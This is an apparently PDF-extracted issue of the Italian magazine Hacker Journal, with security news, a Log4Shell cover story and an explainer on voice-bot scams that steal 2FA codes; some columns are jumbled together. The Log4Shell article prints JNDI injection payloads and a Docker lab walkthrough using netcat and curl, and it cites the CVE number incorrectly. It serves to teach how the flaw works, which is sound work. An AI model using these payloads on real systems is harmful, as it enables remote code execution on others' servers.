CREARE

febbraio

UN’IDENTITÀ FAKE
N.259

Ecco come fanno i pirati a sembrare

qualcun altro mentre circolano in Rete
w w w. h a c ke r j o u r n a l . i t

Dal 2002 tutto quello che gli altri non osano dirti

Il segugio
del filesystem
Ricostruiamo tutte le azioni
svolte sui file dagli utenti
del computer

La scheda che
TARIFFA R.O.C. Poste Italiane S.p.A. – spedizione in abbonamento postale – MBPA/LO-NO/125/A.P./2017- ART.1 COMMA1- S /NA

cattura il Wi-Fi
Il trucco per trasformarla
in un router wireless
e ficcanasare nell’etere

Internet... è arrivata
l’apocalisse!Una libreria usata da migliaia di aziende e sviluppata
Il bot che da pochi volontari... cosa mai potrà andare storto? Tutto!
ti ruba il 2fa
Negli USA spopolano
i sistemi vocali
automatici che fregano
gli account agli utenti.
pentesting messaggi nascosti
Se riesci a scrivere la cosa giusta Impara l’arte della steganografia
E si comprano al nei log di un sistema, gli fai fare e neanche l’NSA riuscirà a spiare
mercato del Dark Web ciò che vuoi con un attacco RCE le tue comunicazioni riservate
 MA THE

GEEK
Dall’Autore di Bestseller Philip Osbourne

MAI PIÙ BUGIE.

DA NESSUNO!
Dall’autore del bestseller
“DIARIO DI UN NERD”,
un romanzo per giovani
adulti, ma anche per
lettori più attempati,
divertente, accattivante,
che sorprende e fa
riflettere.
DA MARZO IN
LIBRERIA.

Mac è un nerd di 16
anni che scopre che
la sua ragazza lo ha
ingannato e tradito.
E lo ha fatto proprio
con il migliore amico
del giovane.
Il nostro protagonista
non si fa sopraf-
fare dalla delusione
e decide di creare
un’App che può
rilevare le bugie in
tempo reale.

HA INVENTATO UN’APP E ORA NESSUNO PUò MENTIRE!

PRENOTALO SU: www.csaeditrice.it
 EDITORIALE
www.hackerjournal.it
In questo numero parliamo di:
Log4jShell, 2FA, Rocket.Chat, identità
fake, Mutillidae, buffer overflow,
sniffing del Wi-Fi, steganografia,
mercato di bot illegali e molto altro.

M
atrix è sempre più vicina. Di cosa
parliamo? Del tanto decantato
metaverso, la tecnologia che ci farà
immergere in una realtà a cavallo tra
quella “reale” e quella virtuale. Chi ha letto il romanzo di
fantascienza Snow Crash di Neal Stephenson sa bene di
cosa si tratta: il metaverso è una simulazione iper realistica
del mondo reale, in cui ci muoveremo usando un avatar,
un “personaggio” che ci rappresenterà. Per entrare
in questa realtà digitale useremo (o dobbiamo già dire
“usiamo”?) strumenti come l’Oculus Quest 2 di Facebook...
no, scusate, Meta. Ma gli attori scesi in campo sono tanti
(Microsoft, NVIDIA, Roblox, Epic Games...) e il volume
d’affari è già notevole. Tutto molto bello, ma se già ora
i nostri dati personali girano con pochi controlli in Rete, CONTATTI
cosa succederà della nostra “identità digitale” in un mondo
REDAZIONE
totalmente inesplorato e in mano alle solite big del tech o a
redazione@hackerjournal.it
quelle nuove che entreranno nel mercato? Per non parlare
ABBONAMENTI
del cybercrimine, che di sicuro non si lascerà sfuggire E ARRETRATI
abbonamenti@sprea.it
questa nuova frontiera. Tanto per citare i possibili pericoli: www.sprea.it/digital
sorveglianza ancora più a 360°; maggiori possibilità
FACEBOOK
di falsificare le identità o di “orientare” le nostre decisioni; www.facebook.com/
hackerjournal/
furto di dati biometrici o di altro tipo; distacco dalla realtà...
E non sappiamo se ci sarà la pillola blu per risvegliarci. SITO WEB
www.hackerjournal.it
 ro sara
Il prossimo num5efe
in edicola dal 2 bbraio

SOMMARIO ABBONATI ALLA

VERSIONE DIGITALE
SOLO PER PC E MAC
A SOLI 19,90 €
DURATA ABBONAMENTO: 1 ANNO
www.hackerjournal.it/abbonamenti

HACKTUALITÀ
News
Notizie e anticipazioni dell’universo hacker................................................................ 06

COVER STORY
Internet... è arrivata l’apocalisse
La vulnerabilità Log4Shell sta preoccupando l’intera Rete.................................... 10

Furto 2FA | Il mercato dei bot illegali

Ecco come funziona l’attacco che negli Stati Uniti sta truffando
gli utenti usando bot che rubano le credenziali.......................................................... 16

Vulnerabilità | Bucare la chat senza SQL

Rocket.Chat ha alcune noSQL injection che permettono di bypassare
il login diventando amministratore di sistema........................................................... 20

M IGL IORARE
A I
P
U
R
T
E
A
F
C
EI
RA
I TA!
A T UA R I V ISTA
L .ly/hackerjo
://bit
urnal
Vai su https questionario anonimo
e compila il
 4
 Il primo manifesto hacker
“... avete mai guardato dietro agli occhi dell’hacker?
Vi siete mai chiesti cosa lo stimola, che forze
lo hanno formato, cosa può averlo forgiato?
Io sono un hacker, entra nel mio mondo...”

ke
Profili fa
SICUREZZA
Profili fake | Pirati e false identità
Alcune risorse per creare identità fittizie da usare in Rete................................... 24
Pentesting | Attacco ai log! Terza parte
Dopo XSS e DoS, ecco a voi un attacco RCE in salsa log!....................................28

> 24

HOW TO 36
Sniffing | Sniffare il traffico su rete Wi-Fi
Basta un SoC da pochi euro per catturare i pacchetti scambiati dai device vicini... 36

Buffer overflow | Attacco tramite shellcode!

Diventare root sfruttando una vulnerabilità del codice...........................................................42

Steganografia | L’arte di nascondere i file dentro ai file

La tecnica per comunicare con altri hacker senza farci spiare dalla NSA................. 48

odeMCU ESP8266
Log di Windows | Accessi al filesystem! N
Grazie all’audit di Windows, ricostruiamo le attività di ogni utente sul PC................50

> 56
HACKULTURE
Dati personali | Facebook è il male, ma Google è il suo maestro
Zuckerberg ha imparato come estrarre e monetizzare i dati dalle persone
grazie al lavoro fatto venti anni fa da Larry Page e Sergei Brin...................................... 56

tt o ri , le risposte de lla redazione > 60

Le do m a n d e d e i le
POSTA
 HACKTUALITÀ

NLETETURW
E
S Hanno sfondat
o
are
anche il nucle
#LEAK 800 GB di dati sensibili sugli impianti nucleari
italiani sono finiti su un forum russo di pirati informatici

S u RaidForums (https://raidforums.com), una piattaforma russa

utilizzata da molti hacker e cracker per condividere i propri attacchi,
è stato pubblicato un thread riguardante l’azienda Sogin S.p.A. che si
occupa del recupero e smaltimento del materiale radioattivo delle ex
centrali nucleari italiane. In un comunicato stampa, Sogin dichiara di aver
riscontrato un attacco hacker al suo sistema informatico. La società ha
immediatamente informato le autorità competenti con le quali sono state
messe in atto le procedure per porre rimedio all’accaduto e verificare
l’eventuale violazione di profili collegati alla privacy e alla sicurezza
dei dati. Sogin garantisce che la sicurezza sia nucleare che convenzionale
QUANTUM COMPUTING
degli impianti e la loro operatività è sempre stata garantita. Il file
interessato ha le dimensioni di 800 GB e contiene dati che vanno dal
I computer quantistici
promettono di rivoluzionare 2004 al 2020, il data leak più grave nelle case history dell’hacking in Italia.
molti ambiti, compreso quello Una traccia di come questo sia potuto accadere è fornita in un file che
della sicurezza informatica. contiene la lista di tutti i file sottratti durante il furto: tra i nomi dei file
Questo manuale, partendo anche foto di WhatsApp, documenti chiamati chiavi accesso.docx e altri
dalla definizione di qubit, elementi che lasciano pensare a un computer di un dipendente,
ci spiega cosa possono fare un PC aziendale usato però anche come PC personale senza tutti
e cosa no guidandoci nella gli accorgimenti necessari in questo caso.
programmazione di un
simulatore quantistico
in Python e nella scrittura
di un sacco di codice
in linguaggio Q# con il
Quantum Development Kit
di Microsoft. Le righe di
codice illustrate sono ben
commentate e spiegate dagli
autori, anche se il tema
è abbastanza ostico e
servono delle buone basi di
programmazione per capirlo.
https://bit.ly/hj259_quantum

 6

Albione svela le
parole chiave violate
#PASSWORD L’Inghilterra condivide 585 milioni
di password con Have I Been Pwned
L a National Crime Agency del Regno
Unito ha contribuito con oltre 585
milioni di password al servizio Have
I Been Pwned (https://haveibeenpwned.
com) che consente agli utenti di
verificare se eventuali informazioni
sensibili di un account siano state
violate. Proprio come con le password
provenienti dall’FBI, questa enorme
raccolta è stata aggiunta ai dati di Pwned
Passwords che consente di cercare se la
chiave d’accesso di un account è stata compromessa.
Il progetto Pwned Passwords di HIBP consente alle forze dell’ordine di
più Paesi di aggiungere le password trovate durante le indagini. Pertanto,
altri servizi che utilizzano le sue API possono proteggere i propri utenti
dagli attacchi derivati dall’appropriazione indebita di password.
L’oligarchia
russa
combatte
TOR
#BOICOTAGGIO La Russia ha deciso
di bloccare e censurare la rete a cipolla
D al primo dicembre scorso, l’autorità preposta al
controllo della rete Internet RUNET ha imposto
ai provider russi di bloccare e censurare la rete TOR.
Il blocco è stato avviato dal vettore di telecomunicazioni
Rostelecom il primo giorno di dicembre 2021, seguito
da MTS e Tele 2 il 3 dicembre. Dal sito ufficiale TOR
è stato rilasciato un comunicato dal blog: “La Russia
è il Paese con il secondo maggior numero di utenti
TOR, oltre 300.000 utenti giornalieri o il 15% di tutti
NEWS
Pronti a far fuori
ASSANGE
#INGIUSTIZIA L’Alta Corte
londinese ribalta il verdetto
del giudice e apre all’estradizione
del padre di WikiLeaks
L’ Alta Corte di Londra ha ribaltato
la sentenza di primo grado
che negava l’estradizione di Julian
Assange dalla Gran Bretagna agli
USA. Il caso verrà quindi rinviato al
tribunale di grado inferiore per essere
nuovamente dibattuto. A ricorrere
all’Alta Corte era stato il team legale
americano che si opponeva al divieto
di estradizione sulla base di un
possibile pericolo di suicidio legato
al trattamento giudiziario e carcerario
negli USA. “Un grave errore
giudiziario”, così Stella Moris,
compagna di Julian Assange
e membro del suo team legale,
ha definito la sentenza in un post
pubblicato su Twitter da WikiLeaks.
gli utenti della rete. Poiché sembra che questa
situazione possa degenerare rapidamente in un blocco
TOR a livello nazionale, è urgente che rispondiamo
a questa censura! Abbiamo bisogno del tuo aiuto
ORA per mantenere i russi connessi a TOR!”. Il servizio
chiede a chi può aiutare la causa e gli utenti russi
ad attivare un Bridge TOR. I requisiti e le istruzioni
per avviare questo bridge sono nel post Help
Censored Users, Run a Tor Bridge (https://blog.
torproject.org/run-a-bridge-campaign/).
7 
 HACKTUALITÀ

KALI
LINUX
2021.4
SPACCA!
#DISTRO Il rilascio della
nuova versione porta tanti
miglioramenti e nuove
funzionalità

I n questa nuova versione della nota distribuzione per pentester ed esperti di security, il client Samba è stato
riconfigurato per essere compatibile con qualsiasi server Samba, indipendentemente dall’opzione
di protocollo selezionata sul server. Ciò facilita la ricerca di server Samba vulnerabili sulla rete e anche
la modalità Compatibilità può essere modificata utilizzando l’utility kali-tweaks. Un altro cambiamento
che si distingue, sempre in kali-tweaks, risiede nella configurazione mirror: viene ora fornita la capacità
di accelerare la consegna degli aggiornamenti utilizzando la rete di distribuzione dei contenuti CloudFlare.
Gli sviluppatori della distro hanno poi migliorato il supporto per i sistemi Apple basati sul chip ARM M1
e hanno introdotto la possibilità di cambiare skin e set di icone per le utility Kaboxer, inclusa l’opzione
di utilizzare un tema scuro.

E P R E N D E D I M IRA L’ITALIA
IL RANSOMWAR
#CLASSIFICHE Il nostro Paese è terzo al mondo per attacchi
ransomware subiti, siamo messi bene...

Il dato emerge dall’ultimo report di Trend Micro Research, la

divisione specializzata in ricerca&sviluppo e lotta al cybercrime
di Trend Micro. Nel 2021 l’Italia è stata, come anche in passato,
tra le nazioni più colpite dai cybercriminali. Negli ultimi mesi dello
scorso anno si è confermata tra le prime cinque nazioni al mondo più
colpite dai malware e l’ottobre scorso ha aggiunto un altro primato,
classificandosi terza come Paese maggiormente colpito dai
ransomware. Nel dettaglio, a ottobre 2021 il numero totale di
ransomware intercettati in tutto il mondo è stato di 1.297.400. Gli Stati
Uniti sono stati il Paese più colpito, con il 23,4% di attacchi, a seguire
Francia (7,5%), Italia (5%), Belgio (4,5%) e Brasile (3,8%).
Per quanto riguarda i malware, gli Stati Uniti rimangono i più attaccati,
con 34.816.097 assalti, seguiti da Giappone (31.711.116), Australia
(6.132.704), Italia (6.097.979) e Regno Unito (5.610.942).

 8
HA C K T U A L I TA À
cover story Internet... e arrivata l ’apocalisse
La vulnerabilità Log4Shell sta preoccupando l’intera Rete............................................................... 10

furto 2fa Il mercato dei bot illegali

Ecco come funziona l’attacco che truffa gli utenti usando bot che rubano le credenziali....... 16

Vulnerabilita Bucare la chat senza SQL

Rocket.Chat ha alcune noSQL injection che permettono di bypassare il login diventando root..... 20
 HACKTUALITÀ et... è arrivata l’apocalisse!
COVER STORY: Intern

In t e r n e t .. . è a r r iva t a

Log4jshell
l’apocalisse!
è una gravissima MS
THE FALLEN DREA
vulnerabilità 0-day a volta

P
rendendo ancora un
che ha colpito spunto dal manifes to/
che ha
libro
ci
The Fallen Dreams
migliaia di sistemi accompagnato nei me
andri
articolo
in Rete. Scopri dell’hackin g, il
si presenta come un
se gu en te
o spin-off
come funziona della serie, in cu i ve
gli
sti
av
remo
versari
il ruolo di uno de
del protagonista.
In collaborazione con
thehackingquest.net

 10
E
siste un principio nella fisica quantistica
che descrive lo stato di un sistema e la sua
variabilità a seconda dell’osservatore:
ciò che vediamo esiste in vari stati,
ma noi percepiamo solo quello che stiamo
osservando. Proprio come il famoso gatto di
Schrödinger poteva essere vivo o morto a seconda
che la scatola in cui era contenuto fosse chiusa
o aperta, allo stesso modo ciò che definiamo
“realtà” varia sempre a seconda di chi la osserva,
di chi la vive. Questo ci fa riflettere su due aspetti
(in realtà molti di più): il primo è la necessità
di una scelta; il secondo è la relatività di cui tutto
si compone. Se si osserva una banale libreria Open
Source, ci sarà chi la vedrà come un ottimo
strumento per funzionalità di logging, e chi invece
scorgerà una vulnerabilità con uno score CVSS
10/10, che permette l’esecuzione remota di codice
arbitrario, chiamata log4shell. Ma procediamo
come al solito step-by-step.
CHE COSA È LOG4J?
Si tratta di una libreria molto popolare, scritta
da Ceki Gülcü nel 2001, utilizzata per le interazioni
con i messaggi del codice Java. È difatti possibile
registrare log, messaggi d’errore e di debug
del codice, scrivendoli su uno o più file per
poi consultarli, gestirli o fare troubleshooting.
Difatti, una qualunque applicazione scritta in
linguaggio Java ha necessità di registrare i propri
log. La quantità di questi log è direttamente
proporzionale al crescere della complessità
dell’applicazione.
QUANTO È USATA LOG4J?
Il banner durante l’installazione di Java
è emblematico: “#1 Development Platform”.
E ancora: “3 Billion Devices Run Java”. Vale a dire
figura #1
Qualcuno ha
definito Log4Shell
una vera “pandemia”
che ha colpito metà
delle reti aziendali
che qualsiasi applicazione Java che utilizzi Log4j
è potenzialmente vulnerabile. Qualcuno
sicuramente starà dicendo: “non uso Log4j…
non mi riguarda”. Ma il passaggio non è così
immediato. Anche se un’applicazione non utilizza
direttamente Log4j un’altra libreria potrebbe farne
uso per registrare i propri log. Considerando
la popolarità di questa libreria, potremmo
assumere che mediamente qualsiasi applicazione
Java che registra i propri log, ne faccia uso.
Nei progetti analizzati, è stato stimato che Log4j
venga utilizzata come mostrato in [figura #1].
CHE COS’È LOG4SHELL?
Con un “Common Vulnerability Scoring System”
(CVSS) di 10/10, la vulnerabilità permette
l’esecuzione di un codice remoto (RCE)
sulla macchina vittima: l’attaccante che sfrutta
con successo questa vulnerabilità sull’applicazione
Java può eseguire codice arbitrario sulla macchina
vittima, sia essa un server, un client o un device
di altra natura. Da qui il nome Log4Shell a.k.a.
CVE-2021-4428: il successo dello sfruttamento
della vulnerabilità garantisce una “Shell”
di comandi sulla macchina. Addentriamoci
adesso negli aspetti tecnici della vulnerabilità
e accingiamoci a comprenderne il funzionamento.
Le vulnerabilità sfruttabili in questa libreria
risiedono nella combinazione di diversi
fattori/caratteristiche di Log4j, vediamo la prima.
1
LOG EXPRESSIONS
Log4j ci permette di loggare espressioni.
Analizziamo, per esempio, le seguenti linee
di codice, immagazzinate dal log, scrivendo il log
del dato “Messaggio d’errore”:
final Logger logger = LogManager.
getLogger(…);
logger.error(“Messaggio d’errore: {}”,
error.getMessage());
11 
 HACKTUALITÀ et... è arrivata l’apocalisse!
COVER STORY: Intern
figura #2
Esaminiamo (“Messaggio d’errore; {}”, error.
getMessage());. Ciò che facciamo con questo
codice è andare a “loggare” l’oggetto error.
getMessage fra le parentesi graffe della stringa
“Messaggio d’errore; {}”. In altre parole, ciò
che fa Log4j è inviare l’errore che abbiamo ricevuto
fra le parentesi graffe della stringa di testo.
Il nostro output sarà quindi: Messaggio d’errore:
[l’errore contenuto nell’oggetto error.getMessage].
Un ulteriore esempio può essere il seguente:
la stringa immagazzina nel log il nome dell’utente
get(“Name”) con il relativo id getId() utilizzato
per effettuare l’accesso.
logger.info(“L’utente {} ha effettuato
l’accesso con l’id {}, map.get(“Name”),
user.getId());
2 3
JAVA NAMING AND DIRECTORY
INTERFACE (JNDI)
È un’API Java che permette di scrivere
e immagazzinare un dato oggetto Java in un dato
 12
UNA TECNICA CHE
HA GIÀ COLPITO
IN PASSATO
La tecnica d’attacco definita come LogInjection,
a.k.a. Log Forgery, non è nata di certo con
la vulnerabilità Log4Shell, anzi è alla base di
molteplici attacchi. Si tratta di una vulnerabilità
in cui l’input non attendibile, immesso in una data
applicazione, può compromettere l’integrità
dei file di registro dell’applicazione o del sistema
stesso. È stata utilizzata (e in parte viene
usata ancora adesso) per ingannare i sistemi
di monitoraggio e Security Information
and Event Manager (SIEM).
percorso (una “remote location”) in modo
consecutivo, “serializzandolo”. Un esempio può
essere il seguente Active Directory link (LDAP URL):
ldap://10.10.10.10:5555/O=HackerJournal,
C=IT
dove:
• ldap:// - invochiamo l’LDAP schema, il nome
del comando;
• 10.10.10.10 - l’indirizzo IP del server a cui stiamo
puntando;
• :5555 - la porta del server a cui stiamo puntando;
• /O=HackerJournal, C=IT - profile object a cui
stiamo puntando.
JNDI LOOKUPS MESSAGES
La terza caratteristica che analizzeremo
fu introdotta in Log4j nel 2013 e permette
di eseguire un JNDI Lookup su una determinata
figura #3

tipologia di stringhe (una ricerca di un dato
carattere) e inserirla nel messaggio d’errore.
Prendiamo, per esempio, il seguente codice:
logger.error(“Messaggio d’errore: {}”, “Log4j
HackerJournal”);
Molto intuitivamente, viene scritta all’interno del log
la stringa Log4j HackerJournal. E se invece la stringa
che noi passiamo è un argomento con una sintassi
speciale, per esempio con il carattere “dollaro”?
logger.error(“Cerca ed inserisci il valore:
{}”, “${jndi:ldap://…}”);
Il carattere $ rappresenta una “sintassi speciale di
Lookup”, che andrà inserito fra le parentesi graffe.
Nel medesimo modo una variabile di sistema potrà
anch’essa essere inserita fra le parentesi graffe
e scritta nel nostro flusso di log:
logger.error(“Cerca ed inserisci il valore:
LOG4SHELL
STORYLINE
I primi fix per questa vulnerabilità sono stati
rilasciati il 6 dicembre 2021. Log4j, versione
2.15-rc1, restringeva la lista dei server e dei
protocolli che potevano essere usati per il lookup.
Successivamente sono stati scoperti altri bug
CVE-2021-45046, fixati nella versione 2.16.0
disabilitando tutte le feature di JNDI e message
lookup. Tuttavia, altre due vulnerabilità hanno
messo in evidenza la possibilità di denial-of-
service CVE-2021-45105 fixata nella versione
2.17.0 e un’altra RCE fixata a sua volta nella
versione 2.17.1 CVE-2021-44832.
figura #4
{}”, “${env:ENV_VALUE}”);
Proprio quest’ultima caratteristica di Log4j
rappresenta la nostra vulnerabilità. Ma facciamo un
esempio concreto.
LOG INJECTION
Ipotizziamo di poter inserire diversi valori in una
pagina (un form) di ricerca. Questi valori verranno
successivamente passati all’applicazione Java in
background, che si occuperà di eseguire la ricerca e
di loggare anche i valori ricercati dall’utente [figura
#2]. Quindi nella nostra app avremo il seguente
codice, che memorizzerà ciò che l’utente ha inserito
per effettuare la ricerca searchTextInput nei log.
final Logger logger = LogManager.
getLogger(…);
logger.error(“Pagina ricercata: {}”,
searchTextInput());
Ora però, ipotizziamo che il nostro utente
sia l’attaccante e che invece di inserire nel form
di ricerca una parola o una frase, immetta
il seguente valore (un JNDI URL):
${jndi:ldap://phishing-ldap/evilobject”}
Quando nel nostro sistema di log arriverà in input
come searchTextInput un JNDI URL, il sistema
tenterà di risolverlo automaticamente eseguendo
una JNDI Call e puntando quindi all’indirizzo
di dominio //phishing-ldap/. All’attaccante sarà
sufficiente inserire nel server malevolo il codice
che desidera eseguire come “object” e l’applicazione
vittima (sia essa un popolare e-commerce
o un social media) lo eseguirà immediatamente.
Adesso che abbiamo compreso il funzionamento
di log4Shell, facciamo un po’ di pratica.
13 
 HACKTUALITÀ et... è arrivata l’apocalisse!
COVER STORY: Intern
PROOF OF CONCEPT
Per effettuare il nostro test utilizzeremo il seguente
exploit per Log4j, scaricabile al seguente indirizzo:
https://github.com/leonjza/log4jpwn. Come prima
cosa, avviamo la nostra Kali Linux e apriamo
un terminale di comando. Cloniamo il repository
utilizzando il comando
git clone https://github.com/leonjza/
log4jpwn
Spostiamoci all’interno della cartella log4jpwn
utilizzando il comando cd. Ora effettueremo
il nostro PoC all’interno di un docker container.
Un container docker ci permette di eseguire
processi e applicazioni in maniera isolata
utilizzando il kernel Linux, senza correre il rischio
di compromettere il sistema ospitante.
Come prima cosa, abbiamo bisogno di installare
Docker su Kali Linux. Dopo aver aggiornato il nostro
repository con il comando
sudo apt-update
digitiamo
sudo apt install -y docker.io
sudo systemctl enable docker –now
A questo punto, non rimane che aggiungere
il nostro utente al gruppo “docker“:
sudo usermod -aG docker $USER
 14
COSA POSSO FARE?
Niente, in linea generale. Sono
gli amministratori di sistema che
hanno dovuto (o devono se non
l’hanno ancora fatto) intervenire,
aggiornando server e applicazioni
a livello di backend. Chissà se
riusciranno a patchare anche le
sonde spaziali che usano Log4j...
Eseguiamo il comando
docker –version
per verificare la versione installata. Una volta
terminata l’installazione di Docker possiamo
procedere con l’installazione del nostro container,
digitando il comando [figura #3]
docker build -t log4jpwn
L’installazione del container potrebbe impiegare
qualche minuto. Avviamo adesso il nostro
container utilizzando il comando [figura #4]
docker run --rm -p9999:8080 log4jpwn
dove:
• docker - invoca docker
figura #5
 Facendo delle scansioni del ${jndi:ldap://172.17.0.1:8888/a}’

perimetro esterno e di quello localhost:9999

interno possiamo scoprire Curl è un tool (che utilizza le librerie libcurl) a linea
se le macchine della nostra di comando, per prelevare o inviare dati (inclusi file)
rete sono vulnerabili utilizzando la sintassi Uniform Resource Locator
(URL). Nell’esempio precedente abbiamo usato
• run - avvia il container le opzioni seguenti:
• --rm - rimuove i volumi associati al container • -H - opzione necessaria per specificare l’Header
• -p9999:8080 - specifica la porta ‘User-Agent: ${jndi:ldap://172.17.0.1:8888/a}’
• log4jpwn - il nome del container che desideriamo localhost:9999;
eseguire. • ldap://172.17.0.1:8888 - simula il server malevolo
Prima di eseguire il prossimo comando verifichiamo controllato dall’attaccante. L’indirizzo IP ldap sarà
l’IP del nostro docker. Apriamo un nuovo terminale l’IP del nostro docker container che abbiamo visto
e digitiamo essere 172.17.0.1. Abbiamo così avviato netcat
in ascolto sulla porta 8888;
ip a s docker0 • localhost:9999 - è il nostro servizio vulnerabile
in ascolto sulla porta 9999.
dove: Appena avremo premuto Invio, riceveremo
• ip - questo comando può essere usato la nostra connessione su netcat [figura #5]!
per mostrare o manipolare routing, device

L’USO FURBETTO
o tunnel;

DEL SOFTWARE
• a - mostra tutto (all);
• s - mostra “statistiche”;

OPEN SOURCE
• docker0 - il nome del device, in questo caso
il nostro docker, di cui vogliamo visualizzare
l’indirizzo IP.
Nel nostro caso (e probabilmente anche nel vostro)
sarà: 172.17.0.1. Non chiudiamo il terminale
(per comodità) e sempre sullo stesso
in cui abbiamo verificato l’IP, mettiamoci
in ascolto digitando
nc -lnvp 8888
con
• nc - invochiamo netcat;
• -l - mettiamoci in ascolto localmente;
• n - no DNS o hostname;
• v - in modalità verbose;
• p - specifichiamo la porta;
• 8888 - porta su cui ci stiamo mettendo in ascolto.
A questo punto, non ci resta che lanciare
il comando malevolo. Apriamo un nuovo terminale
e digitiamo il comando
curl -H ‘User-Agent:
Vorremmo ora concludere questo capitolo
con una riflessione di “Koushik Kothagal (Java
Brains)”: i media in generale stanno parlando
molto di questa vulnerabilità (come è giusto
che sia). Tuttavia è necessario riflettere
su un particolare. La feature che espone Log4j
all’exploitation fu introdotta nel 2013 ed è venuta
alla luce solamente nel 2021. In generale, questi
tipi di vulnerabilità sono già avvenuti in
precedenza (per esempio Heartbleed) e il
denominatore comune è sempre lo stesso: molte
aziende utilizzano gratuitamente software Open
Source per fini economici. Molteplici imprese
trovano software Open Source già pronti e ci
costruiscono attorno il loro Business Model
per fare soldi e questo succede spesso anche
con aziende di Cyber Security. Forse è giunto
il momento in cui società e aziende che fanno
soldi e fondano modelli di Business su software
Free (che la comunità mette a disposizione)
si attengano a un modello etico per cui quando
investono sul software (compresa la Cyber
Security) si impegnino a riconoscere alla
comunità la sua dovuta importanza.

15 
 HACKTUALITÀ
Il m e r c a t o d e i
2FA, SICURA O NO?
b o
Il mantra dietro l’autenticazione
t i l l e g a l i
a due fattori è “Qualcosa che sai,
qualcosa che hai, qualcosa che
sei”. Ok, sono tre, ma il motivo
è che si può scegliere. Quello
che sai è la password, il pin o la
risposta alla domanda segreta.
Quello che hai è qualcosa in tuo
possesso: lo smartphone, la carta
di credito, il token con il chip RFID.
Quello che sei è la biometria: dalle
impronte digitali alla scansione
dell’iride o al riconoscimento della
voce. La sicurezza deriva dal fatto
che la compromissione di uno di
questi fattori da solo non sblocca
l’account. Ma solo se la 2FA viene
usata in modo corretto.
Il problema è che non basta che
siate voi utenti a fare tutto giusto,
anche il fornitore del servizio e gli
altri attori coinvolti (per esempio i
produttori dei telefonini e dei loro
sistemi operativi) devono fare
le cose a regola d’arte per evitare
gli attacchi (scegliere i fattori di
autenticazione corretti e verificare
in tempo reale che non ci siano
nuovi attacchi capaci di superarli)
e proteggere i vostri dati.
 16
o co m e fu nz io na no gli attacchi che negli
E cc
et to no di tr uf fa re i consumatori
USA perm
i codici 2FA
usando bot che rubano
L’
attacco non potrebbe
essere più semplice.
Facciamo finta che
siete negli USA e che
il sistema di prevenzione delle
frodi di PayPal vi chiami con
uno dei suoi bot vocali che
fanno chiamate automatiche
per informare che c’è una spesa
in corso. Sul vostro telefono
è appena arrivata la notifica
che avete speso una cifra
piccola (una trentina di dollari).
Il bot vi chiama informandovi
che si tratta di un acquisto
fraudolento e che per fare
la verifica e bloccarlo dovete
digitare il codice che PayPal
vi ha appena inviato per SMS.
Lo fate e a questo punto il bot
vi rassicura che la truffa è stata
bloccata, ma ci vorranno dalle
24 alle 48 ore prima che
la spesa venga scaricata
dal vostro conto e che l’ID
della pratica è xxxx. Ecco,
siete appena stati truffati.
I FAKE CALLER ID
La prima parte di questo tipo
di truffa si basa sulla capacità
dei cybercriminali di effettuare
chiamate in automatico
falsificando il proprio caller ID
e trasformandolo in cose come
PayPal Inc. o Banca XX.
Questo è possibile perché
chiamano utilizzando sistemi
VoIP su linee internazionali con
dichiarazioni del caller ID che
non possono essere verificate.
La chiamata è fatta da un vero
bot: la voce è chiaramente falsa.
Non c’è nessun trucco in questo,
ci siamo abituati anche in Italia:
stanno aumentando i servizi
commerciali che vendono bot
audio per fare telefonate di
marketing. Li usano grandi
aziende come Amazon ma anche
le compagnie telefoniche
e sempre più spesso anche
aziende commerciali italiane.
I bot servono perché,
ovviamente, costano molto

I truffatori impartiscono i comandi
ai bot audio usando piattaforme
come Telegram e Discord
meno di un operatore “vivo”
e possono essere parallelizzati
molto velocemente. Il fatto che
i bot dei cyberattaccanti suonino
proprio come bot audio è un plus
dell’attacco, perché come per
tutte le altre truffe deve sembrare
plausibile. Spesso la voce
sintetica è la stessa o molto simile
a quella usata da altri servizi.
LA TRUFFA CHE BATTE LA 2FA
I sistemi di autenticazione a due
fattori sono sicuri nella misura
in cui lo è il sistema in cui
vengono usati e i comportamenti
dell’utente che li usa. Come dice
L’economia dei cybercriminali
Lo spam con dentro attacchi
di phishing ci insegna una lezione
molto importante sull’economia
e la scala delle operazioni dei
cybercriminali che cercano
di rubare soldi alle vittime
che rispondono e abboccano
all’amo digitale.
Il tempo è denaro ma solo nella
fase della risposta. Alcuni anni fa
l’American Economic Association
con la ricerca The Economics of
Spam (https://bit.ly/hj259_report)
ha spiegato la strategia dei
cyberattaccanti: l’invio di email
di spam, che sono fatte in serie
e automatizzate, ha un costo
bassissimo, praticamente
irrilevante. Invece, il costo per
i cyberattaccanti inizia quando
qualcuno risponde. Prendiamo
il classico Nigerian Scam, quello
in cui un parente di un ricco nobile
africano chiede di spostare dei
soldi dal proprio conto africano sul
vostro per sfuggire alla rivoluzione
il santo protettore della
cybersecurity, Bruce Schneier, “la
sicurezza è un trade-off: più un
sistema è sicuro meno è usabile
e viceversa”. E sappiamo già che
gli utenti vogliono poter usare
i loro conti correnti, account
di PayPal, Amazon, eBay e via
dicendo senza troppe difficoltà.
La truffa in questo caso è
piuttosto ovvia: il bot vocale
fa parte della stessa squadra
che vi ha appena addebitato
un pagamento su PayPal (quindi
conoscono la vostra mail,
la vostra password e il vostro
numero di telefono cellulare).
che infiamma il Paese. Se vi arriva
quella mail e rispondete “Voglio
aiutarti!”, dall’altra parte si siede
un operatore che si prende carico
della vostra pratica. Ogni “pesce”
che sta per abboccare diventa
un ticket con un dossier, che viene
passato da un operatore all’altro
FURTO 2FA
La chiamata serve per ottenere
da voi l’ultimo elemento che
manca al completamento della
transazione: il codice inviato,
nell’esempio da PayPal, che ha
valore per pochi minuti. L’attacco
diventa, nella sua seconda parte,
un “man in the middle”:
l’attaccante è collegato da una
parte al vostro servizio e
dall’altra a voi, e fa finta con
ciascuno dei due di essere l’altro,
passando domande e risposte.
IL DIAVOLO STA NEI DETTAGLI
Un attacco di questo genere
è estremamente semplice
ed efficace, per come è stata
concepita la difesa (codice
via SMS) e per come sono stati
strutturati i meccanismi
di verifica (telefonate di bot
a seconda degli orari di lavoro
delle farm di truffatori (spesso
in Europa dell’Est). È un sistema
di gestione delle relazioni
con la clientela che ha l’obiettivo
di far abboccare sino in fondo
il pesce, cioè l’utente credulone.
E spillargli dei soldi.
17 
 HACKTUALITÀ
legittimi) in un contesto in cui
queste telefonate possono
essere fatte anche da attaccanti
in maniera molto semplice
e a basso costo. Quello che serve
al cyberattaccante, però, è il bot
giusto capace di fare questo tipo
di operazione. Dove procurarselo?
Niente di più semplice, c’è un
marketplace per questo.
ALLA FIERA DEI BOT
Usare un bot è un modo per
internazionalizzare un attacco:
